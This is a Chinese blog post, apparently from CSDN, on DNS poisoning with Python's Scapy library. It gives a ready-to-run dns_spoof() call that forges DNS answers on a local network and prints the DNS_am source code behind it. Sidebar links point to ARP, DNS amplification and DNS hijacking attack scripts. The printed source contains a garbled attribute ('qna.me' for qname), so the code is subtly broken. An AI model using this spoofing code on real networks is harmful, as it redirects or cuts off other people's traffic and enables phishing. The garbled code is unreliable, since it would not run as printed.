Python中的Scapy初探之四--DNS中毒

最新推荐文章于 2024-03-09 04:25:09 发布
最新推荐文章于 2024-03-09 04:25:09 发布
阅读量2.1k 收藏 2
点赞数
分类专栏: python 文章标签: python 网络
原文地址:Python中的Scapy初探之四--DNS中毒作者:小牛牛

今天做了ARP缓存中毒,又看到了DNS中毒,觉得比较新鲜。Scapy还真不是盖的

简单来说,DNS中毒就是自己做一个应答的DNS包,发送给客户端,这样,客户端就中毒了,因为不管发出什么DNS请求解析,得到的都是伪装的DNS应答包,这样就什么都访问不了鸟,这个做起来也非常的简单

Scapy里面有一个工具,就是专门做DNS中毒的,它就是dns_spoof(),这玩意非常好使,搞得我都上不了网了

运行起来也很简单

dns_spoof(joker=’x.x.x.x’,match={‘www.baidu.com.’:'61.135.169.125'})

joker用来替换DNS请求返回的IP地址,这个可以随便设置,反正只要用了它,返回的DNS应答包就全是这个IP地址了,至于match,是一个字典数组,可以用来替换返回真正的地址,例如www.baidu.com的正确IP地址是61.135.169.125

在填写match的时候,网址后面要加一个点

这个字典文件可以很多,用来替换正确的IP地址

一旦运行起来,就会一直监控,也就是DNS解析无法正常使用,非常的毒辣

看了一下源码

class DNS_am(AnsweringMachine):
    function_name="dns_spoof"
    filter = "udp port 53"

    def parse_options(self, joker="192.168.1.1", match=None):
        if match is None:
            self.match = {}
        else:
            self.match = match
        self.joker=joker

    def is_request(self, req):
        return req.haslayer(DNS) and req.getlayer(DNS).qr == 0
   
    def make_reply(self, req):
        ip = req.getlayer(IP)
        dns = req.getlayer(DNS)
        resp = IP(dst=ip.src, src=ip.dst)/UDP(dport=ip.sport,sport=ip.dport)
        rdata = self.match.get(dns.qd.qna.me, self.joker)
        resp /= DNS(id=dns.id, qr=1, qd=dns.qd,
                    an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata))
        return resp

这个写的还是很有功底的,怪不得找不到帮助文档,看看源代码就好了。明天研究一下DHCP,嘿嘿

txyj08
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python实现dns劫持_通过pythondnspython模块实现DNS流量攻击
weixin_39604350的博客
12-15 434
一、我是个菜B,慢慢摸索学习。安装模块 pip install dnspython使用python调用dnspython模块,写了一个dns攻击的小程序,目标IP为自己搭建的DNS服务器,并且可以获取DNS的标志位返回值,其还可以使用程序查看返回值,其实没卵用。相关的DNS报文格式大概如下:(1)公共报文头格式其header报文头是必须有的,其他的有没有在报文头里有定义:标识ID: 请...
dns放大攻击python代码_Python使用scapy模拟数据包实现arp攻击、dns放大攻击例子...
weixin_42133969的博客
02-01 366
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试。这里就直接用pythonscapy搞。这里是arp的攻击方式,你可以做成arp攻击。#!/usr/bin/python"""ARP attack"""import sys, osfrom scapy.all import *if os.geteuid() != 0:...
网络协议:数字世界的规则与桥梁
最新发布
2301_81489672的博客
03-09 2021
网络协议对现代通信的影响是深远的,它们是现代数字通信基础设施的核心组成部分。网络协议定义了数据在网络的传输方式,包括数据格式、传输顺序、错误处理方法等。网络虚拟化和SDN技术将使网络管理更加灵活和高效。网络协议可能会更加模块化,以支持网络功能的软件化和自动化配置。端口号是用于区分同一台计算机上的不同网络服务的数字标识。它们与IP地址一起用于指定特定的服务和应用程序。VPN(虚拟私人网络)允许用户通过加密的隧道安全地连接到另一个网络,通常是互联网。这样可以保护数据传输不被窃听或篡改,并可以绕过地理限制。
利用python+scapy抓取DNS数据包
06-04
程序只会抓取DNS数据包。不会去抓取其他类型的数据包!
scapy模拟攻击_PythonScapy初探之五-DNS洪水攻击
weixin_36430300的博客
01-13 365
肿么回事,现在肿么都是这些东西?不过看了别人的代码,忍不住留个纪念,对生成随机的数据包有启发,其实,在Scapy有专门的洪水发包的方法srflood: Flood and receive packets at layer 3srloop: Send a packet at layer 3 in loop and print the answer eachtimesrp: Send and r...
python获取域名对应的ip_09python实现DNS查找域名对应的IP地址
weixin_39531037的博客
02-21 746
# DNS:是一个UDP层上边的协议,用于将域名转换成IP地址,在我们平时浏览网页的时候,# 这个我们平时用到的特别多的,在我们打开浏览器进行搜索网页的时候,不是填入IP地址进行# 搜索的,而只是输入域名,DNS协议会将域名解析成IP地址,然后记性寻找我们访问的网页。from scapy.all import *# 传入两个参数,域名和域名服务器。def dns_query(dns_name,dn...
python_scapy
03-17
"scapy-dns"标签表明项目可能涉及到DNS(域名系统)协议的使用。DNS是互联网的重要组成部分,负责将人类可读的域名转换为IP地址。Scapy可以创建和解析DNS请求和响应,这对于网络故障排查、安全审计或者进行DNS劫持...
Python库 | scapy_helper-0.5.2-py2.py3-none-any.whl
02-19
要安装`scapy_helper`,首先确保你的Python环境已经安装了Scapy。然后,你可以使用`pip`来安装`.whl`文件: ```bash pip install scapy_helper-0.5.2-py2.py3-none-any.whl ``` 安装完成后,就可以在你的Python...
Python库 | scapy_helper-0.1.9-py3-none-any.whl
04-26
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:scapy_helper-0.1.9-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | scapy_helper-0.1.12.tar.gz
05-21
资源分类:Python库 所属语言:Python 资源全名:scapy_helper-0.1.12.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
python去除非字符串_python去除字符串里的非数字
weixin_39522103的博客
12-10 874
java Unicode、ISO-8859-1、GBK、UTF-8编码转换深入浅出参考文献:搞懂ASCII, ISO8859-1, ANSI和Unicode Unicode百度文献 ISO-8859-1百度文献 注: 1.utf-8虽然是国际编码,对不同范围的字符使用不同长度的编码 ...Hadoop 添加删除数据节点(datanode)前提条件: 添加机器安装jdk等,最好把环境都搞成一样,示...
DNS欺骗攻击与Python实现
Javachichi的博客
11-18 537
DNS欺骗攻击的原理就是攻击者伪装成DNS服务器,向受害者发送虚假的DNS响应,告诉受害者请求的域名对应的IP地址是攻击者自己控制的恶意网站的IP地址。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
python实现dns劫持_Python程序之DNS劫持
weixin_39530557的博客
12-15 794
实验环境:虚假网站端:虚拟机Windowsserver 2008攻击机:Windows7靶机端:Windows10实验步骤:设置虚拟机网络适配器为桥接模式虚拟机设备设置 编辑虚拟网络编辑器 查询Windowsserver 2008的IP地址并搭建自己的网站 新建一个自己的网站(即攻击后劫持网站)编写DNS劫持代码from scapy.all import *import sysimp...
PythonScapy初探之五-DNS洪水攻击
txyj08的专栏
08-28 2688
原文地址:PythonScapy初探之五-DNS洪水攻击作者:小牛牛 肿么回事,现在肿么都是这些东西?不过看了别人的代码,忍不住留个纪念,对生成随机的数据包有启发,其实,在Scapy有专门的洪水发包的方法 srflood             : Flood and receive packets at layer 3 srloop              : Send
python scapy是什么_PythonScapy初探之四--DNS中毒
weixin_39776787的博客
12-08 227
今天做了ARP缓存中毒,又看到了DNS中毒,觉得比较新鲜。Scapy还真不是盖的简单来说,DNS中毒就是自己做一个应答的DNS包,发送给客户端,这样,客户端就中毒了,因为不管发出什么DNS请求解析,得到的都是伪装的DNS应答包,这样就什么都访问不了鸟,这个做起来也非常的简单Scapy里面有一个工具,就是专门做DNS中毒的,它就是dns_spoof(),这玩意非常好使,搞得我都上不了网了运行起来也很...
scapy】进行DNS协议测试
weixin_34336526的博客
03-31 947
2019独角兽企业重金招聘Python工程师标准>>> ...
python网络攻击总参三部_python利用scapy模拟数据包及常见的攻击
weixin_39554170的博客
11-22 351
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试。这里就直接用pythonscapy模块开始搞了。这里是arp的攻击方式,你可以做成arp攻击#!/usr/bin/python"""ARP attack"""import sys, osfrom scapy.all import *if os.geteuid() !...
python实现dns劫持_DNS劫持原理与实现
weixin_39768695的博客
12-15 607
上篇说到旁路劫持的原理与实现,主要还是针对TCP下HTTP服务而言的,有粉儿问了二个问题,一个问题是基于TCP的HTTP服务可以防劫持吗,网上有许多关于HTTP防劫持的办法,有说检测服务地址的,有说分片传输请求的,有说检测ttl值异常的,有说禁止重定向的,结论是都没用,伪造报文网络层地址原本就是用户的目标地址,否则还叫什么伪造呢,请求报文分片web端能识别劫持设备就能识别,况且你确定你分片的报文...
Python程序之DNS劫持
青柚的博客
05-30 3504
实验环境: 虚假网站端:虚拟机Windowsserver 2008 攻击机:Windows7 靶机端:Windows10 实验步骤: 设置虚拟机网络适配器为桥接模式 虚拟机设备设置 编辑虚拟网络编辑器 查询Windowsserver 2008的IP地址并搭建自己的网站 新建一个自己的网站(即攻击后劫持网站) 编写DNS劫持代码 fr...
python-scapy
09-07
Scapy 是一个强大的 Python 网络包处理库,它可以用于网络分析、封包构建和网络扫描等任务。它提供了一组丰富的功能,可以自定义和操作网络数据包。 使用 Scapy,你可以轻松地发送、接收、解析和修改网络数据包。你...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值